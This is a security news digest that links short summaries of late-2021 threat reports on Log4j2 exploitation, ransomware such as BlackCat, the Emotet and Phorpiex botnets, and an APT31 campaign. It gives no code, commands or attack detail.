Over the last two weeks, we saw the ten families of malicious samples are spreading using the Log4j2 vulnerability Now. NetLab published a blog disclosing Mirai and Muhstik botnet samples propagating through Log4j2 RCE vulnerability. You will also find here the Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild.     

 

For more articles, check out our #onpatrol4malware blog.

Ransomware playbook ITSM.00.099

Source: Government of Canada

Ransomware is a type of malware that denies a user’s access to a system or data until a sum of money is paid. It is a serious and evolving threat to Canadians. The impact of ransomware can be devastating to organizations. Read more.

Ten families of malicious samples are spreading using the Log4j2 vulnerability Now

Source: NetLab

On December 11, 2021, at 8:00 pm, NetLab published a blog disclosing Mirai and Muhstik botnet samples propagating through Log4j2 RCE vulnerability[1]. Read more.

When old friends meet again: why Emotet chose Trickbot for rebirth

Source: Check Point Research

Trickbot and Emotet are considered some of the largest botnets in history. They both share a similar story: they were taken down and made a comeback. Check Point Research observed Trickbot’s activities after the takedown operation. Read more.

Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild

Source: Bitdefender

On December 9, 2021, Apache disclosed CVE-2021-44228, a remote code execution vulnerability – assigned with a severity of 10 (the highest possible risk score). Read more.

APT31 INTRUSION SET CAMPAIGN

Source: ANSSI

In January 2021, ANSSI was informed of a large campaign of attacks against French entities linked to the APT31
intrusion set. The investigations carried out by ANSSI led to the analysis of the intrusion set’s entire chaine of infection. Read more.

ALPHV BlackCat – This year’s most sophisticated ransomware

Source: BleepingComputer

The new ALPHV ransomware operation, aka BlackCat, launched last month and could be the most sophisticated ransomware of the year, with a highly-customizable feature set allowing for attacks on a wide range of corporate environments. Read more.

Phorpiex botnet is back with a new Twizt: Hijacking Hundreds of crypto transactions

Source: Check Point Research

CPR spotted the resurgence of Phorpiex, an old threat known for its sextortion spam campaigns, crypto-jacking, cryptocurrency clipping, and ransomware spread. Read more.